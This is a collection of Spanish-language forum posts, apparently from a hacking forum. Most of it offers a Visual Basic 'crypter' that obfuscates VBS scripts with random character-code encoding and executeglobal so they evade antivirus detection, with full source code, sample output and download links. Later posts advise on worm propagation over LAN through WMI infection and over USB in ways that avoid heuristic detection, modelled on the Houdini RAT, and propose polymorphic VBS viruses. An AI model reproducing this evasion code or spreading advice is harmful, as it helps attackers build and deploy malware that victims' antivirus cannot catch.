nsanedown 

Buenos días, quizás éste código te pueda ayudar...


http://foro.elhacker.net/analisis_y_diseno_de_malware/cactus_vbs_crypter_10-t409804.0.html

Saludos

https://www.mediafire.com/?xi3iug9bcar5r9z

Aquí tienes mi programa para descargar, está compilado para que lo puedas usar, pero si quieres puedes mirar el source que está incluido en el ZIP.

Con éste programa podrás cifrar un mismo fichero de distintas formas, cada copia será única, con nombres de variables aleatorios, stringencription randon, tamaño del fichero final aleatorio, etc...

Debería dejarte cualquier fichero VBS FUD ante cualquier AV.

Que lo disfrutes!

Hola, Bienvenido al foro.

Hay varias formas de cifrar un VBS. Recientemente he creado un pequeño programa para cifrar cualquier VBS, lo deja "oculto" y completamente FUD a los antivirus:



El programa es MUY sencillo, simplemente poner un TextBox y un botón. En el código del botón escribir:

Private Sub menuC_Click()
    Randomize
    Separator1 = Mid("!|@#$%&=-_", Int(Rnd * 10) + 1, 1)
    Variables1 = Mid("ABCD", Int(Rnd * 4) + 1, 1)
    Variables2 = Mid("WXYZ", Int(Rnd * 4) + 1, 1)
 
    R = Int(Rnd * 10)
 
    For i = 1 To Len(Text1.Text)
        X = X & (Asc(Mid(Text1.Text, i, 1)) - R) & Separator1
    Next i
 
    Open App.Path & "\crypted.vbs" For Output As #1
        Print #1, Variables1 & " = " & Chr(34) & X & Chr(34)
        Print #1, Variables1 & " = split(" & Variables1 & "," & Chr(34) & Separator1 & Chr(34) & ")"
        Print #1, "for i = 0 to ubound(" & Variables1 & ") - 1"
        Print #1, Variables2 & " = " & Variables2 & " & chr(" & Variables1 & "(i)+" & R & ")"
        Print #1, "next"
        Print #1, "executeglobal " & Variables2
    Close #1
    DoEvents
    MsgBox "Encryption completed!" & vbCrLf & vbCrLf & "File saved here: " & App.Path & "\crypted.vbs" & vbCrLf & vbCrLf & "Cryptonumber used: " & R
End Sub
 

El programa puede generar hasta 90 archivos diferentes (si mis cálculos no fallan). En la foto, el código VBS cifrado quedaría así:

D = "32%73%90%108%109%94%25%114%104%110%107%25%79%59%76%25%108%104%110%107%92%94%25%97%94%107%94%25%90%103%93%25%105%107%94%108%108%25%109%97%94%25%91%110%109%109%104%103%39%39%39%6%3%6%3%70%108%96%59%104%113%25%27%62%108%109%104%25%94%108%25%110%103%90%25%105%107%110%94%91%90%25%105%90%107%90%25%94%101%97%90%92%100%94%107%39%103%94%109%27%"
D = split(D,"%")
for i = 0 to ubound(D) - 1
Y = Y & chr(D(i)+7)
next
executeglobal Y

Aunque también podría quedar así:

B = "36|77|94|112|113|98|29|118|108|114|111|29|83|63|80|29|112|108|114|111|96|98|29|101|98|111|98|29|94|107|97|29|109|111|98|112|112|29|113|101|98|29|95|114|113|113|108|107|43|43|43|10|7|10|7|74|112|100|63|108|117|29|31|66|112|113|108|29|98|112|29|114|107|94|29|109|111|114|98|95|94|29|109|94|111|94|29|98|105|101|94|96|104|98|111|43|107|98|113|31|"
B = split(B,"|")
for i = 0 to ubound(B) - 1
X = X & chr(B(i)+3)
next
executeglobal X

Si alguien le interesa mi programa para cifrar, subo el EXE + Source. Saludos!!

https://www.mediafire.com/?xi3iug9bcar5r9z

No, InputBox detiene la ejecución del script hasta que se introduzca un dato (o se cancele el input)

Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.BrowseForFolder(0, "Example", 1, "c:\Programs")
If objFolder Is Nothing Then
    Wscript.Quit
End If
wscript.Echo "folder: " & objFolder.title & " Path: " & objFolder.self.path

No lo se


No existe el GoTo en VBS, de todas formas no lo necesitas. El GoTo debería ser eliminado de cualquier lenguaje de programación. En las practicas de la escuela, si mi profesor ve un GoTo te suspende el proyecto. jejej

AA = 1
 
Do
AA = AA +1
	if AA = 5 then Exit Do
Loop
MsgBox AA
 
''''''''''''''''''''''''''''
 
AA = 1
 
While AA <> 7
	AA = AA + 1 
Wend
 
MsgBox AA

En el foro tienes el source del RAT houdini, utiliza http.xml2 y adobstreams para cargar/descargar ficheros. Te servirá también para hacer lo de las imágenes.

Para algo sencillo, te recomiendo que utilices el objeto de VBS Scripting.FileSystemObject, con él podrás hacer ésto que pides y más cosillas.

Te voy a explicar como yo lo hago, pero no voy a darte código, lo escribiré en pseudo-code:

'server
IMG-SOURCE = OpenTextFile(mifoto.jpg)
Winsock.Send(IMG-SOURCE)

'client
GetData(xData)
CreateTextFile("tmpfile.jpg",xData)
LoadPicture("tmpfile.jpg")

Saludos!!

Puedes postear una copia del ejecutable para que la pueda analizar?

Vayamos por partes...

Últimamente se le está dando mucho bombo al gusano de houdini y creo que hay que detenerse un poco y analizar el motivo por el cual ese RAT (sí, es un troyano) tiene una alta tasa de propagación...

Los métodos de propagación del houdini son bastante básicos/normales/conocidos:

• Sustitución de ficheros por accesos directos infectados
• Propagación por USB

Entonces... como es posible que ese worm/RAT se propague tanto?... Pues la respuesta es que utiliza VBS. Actualmente cualquier aplicación EXE es fácilmente detectada por los AV's, el hecho que houdini utilice VBS hace que su detección sea algo más complicada, además que s epuede cifrar y FUDear muy fácilmente cualquier fichero VBS. Incluso se me ocurre la idea de crear un gusaon en VBS polimórfico (es decir, que cada copia del gusano sea diferente y cambie su estructura, manteniendo su funcionalidad). Hacer ese tipo de cosas en VBS es realmente sencillo, de ahí viene el éxito de su propagación.

Por ejemplo, el famoso LoveLetter estaba en VBS también, AnnaKournikova, Melissa (éste era DOC/macro, pero es casi lo mismo) son claros ejemplos.

Sobre tus consultas, el sistema de propagación LAN lo puedes desarrolar usando mi ejemplo de infección por WMI (el del regedit) y el sistema de propagación USB está muy explotado, lo mejor es que utilices un sistema sencillo y de programación casera. Así evitarás la heurística.

Saludos!!

---

EDIT

Vale, acabo de hacer una prueba rápida y sencilla. Es posible programar un módulo para hacer virus/troyanos/worms/downloaders polimórficos en VBS de forma rápida y sencilla. Voy a ver si puedo programar un ejemplo sencillo y lo publico en el foro...